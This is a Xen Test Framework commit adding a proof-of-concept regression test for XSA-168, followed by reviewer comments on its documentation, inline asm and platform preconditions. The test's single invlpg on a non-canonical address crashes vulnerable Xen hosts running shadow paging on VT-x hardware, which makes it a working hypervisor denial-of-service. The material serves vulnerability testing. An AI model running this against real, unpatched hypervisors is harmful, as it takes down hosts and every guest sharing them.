From: Andrew Cooper Date: Thu, 10 Dec 2015 15:59:02 +0000 (+0000) Subject: XSA-168 Proof of Concept test X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=01f8b4b93b1a281e2b49edd81316451b152d7e6d;p=people%2Froyger%2Fxen-test-framework.git XSA-168 Proof of Concept test Must be run with shadow paging Signed-off-by: Andrew Cooper --- diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 891d164..537e9e6 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -26,6 +26,8 @@ Coveres XSA-106 and XSA-156. @subpage test-xsa-167 - PV superpage sanity checks. +@subpage test-xsa-168 - `INVVPID` non-canonical guest address. + @section index-utility Utilities diff --git a/tests/xsa-168/Makefile b/tests/xsa-168/Makefile new file mode 100644 index 0000000..45485e7 --- /dev/null +++ b/tests/xsa-168/Makefile @@ -0,0 +1,13 @@ +ROOT := $(abspath $(CURDIR)/../..) + +include $(ROOT)/build/common.mk + +NAME := xsa-168 +CATEGORY := xsa +TEST-ENVS := hvm64 + +TEST-EXTRA-CFG := extra.cfg.in + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-168/extra.cfg.in b/tests/xsa-168/extra.cfg.in new file mode 100644 index 0000000..211661a --- /dev/null +++ b/tests/xsa-168/extra.cfg.in @@ -0,0 +1 @@ +hap=0 diff --git a/tests/xsa-168/main.c b/tests/xsa-168/main.c new file mode 100644 index 0000000..29389bd --- /dev/null +++ b/tests/xsa-168/main.c 
@@ -0,0 +1,51 @@ +/** + * @file tests/xsa-168/main.c + * @ref test-xsa-168 + * + * @page test-xsa-168 XSA-168 + * + * Advisory: [XSA-168](http://xenbits.xen.org/xsa/advisory-168.html) + * + * This vulnerability only affects VT-x hardware, and can only exploited by a + * guest running with shadow paging. + * + * The `invlpg` (and `invlpga` on AMD) instructions are specified to be nops + * for non-canonical addresses. When using HAP, the instructions are not + * intercepted, and dealt with by hardware. + * + * However with shadow paging, the instructions are intercepted to prevent + * @#PF's from not-yet-populated shadows. On VT-x hardware, this ends up + * turning into a `invvpid` in Xen, which does suffer a @#GP on a + * non-canonical address. + * + * To cause Xen to execute an `invvpid` instruction, the address (omitting the + * sign extension) must be a small page. This is covered in XTF because the + * single 4K page at NULL is unmapped. + * + * The testcase attempts to execute such an `invlpg` instruction. If running + * in shadow mode, on VT-x hardware, on a vulnerable version, Xen will crash + * with a @#GP fault. If not, the test will exit cleanly. The test is unable + * to distinguish between a fixed Xen and a test misconfiguration. + * + * @sa tests/xsa-168/main.c + */ +#include + +void test_main(void) +{ + printk("XSA-168 PoC\n"); + + asm volatile ("invlpg (%0)" :: "q" (0x8000000000000000UL)); + + xtf_success(NULL); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */
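Review bot: The new docs/all-tests.dox entry names the instruction but not the precondition; since the test only does anything under shadow paging on VT-x (the commit message says "Must be run with shadow paging"), the one-line index description should say so, e.g. "`INVVPID` non-canonical guest address (shadow paging, VT-x only)", so a reader of the index does not take a clean exit on HAP or AMD as coverage of the issue.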
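Review bot: extra.cfg.in with `hap=0` enforces the shadow-paging half of the precondition but nothing enforces the VT-x half, so on AMD hardware the test reaches `xtf_success(NULL)` without ever exercising the intercepted `invvpid` path; a comment in extra.cfg.in (or the Makefile) noting that the result is only meaningful on Intel hardware would help whoever reads a passing log later.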
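Review bot: The inline asm in tests/xsa-168/main.c should use the "r" constraint and a "memory" clobber rather than "q" with no clobber: `invlpg` takes a memory operand whose address is in any general register, "q" only restricts the choice on 32-bit builds, and the missing "memory" clobber lets the compiler move memory accesses across a TLB invalidation; `asm volatile ("invlpg (%0)" :: "r" (0x8000000000000000UL) : "memory");` is the usual form. Two wording fixes in the doc comment: "can only exploited by" is missing "be", and "a `invvpid`" should be "an `invvpid`". The `+#include` line as rendered names no header; confirm the framework header is actually present in the committed file. Finally, since the comment itself admits the test "is unable to distinguish between a fixed Xen and a test misconfiguration", consider checking that the precondition holds (shadow mode on Intel hardware) before reporting success, so a clean exit on the wrong platform is reported as inconclusive rather than as a pass.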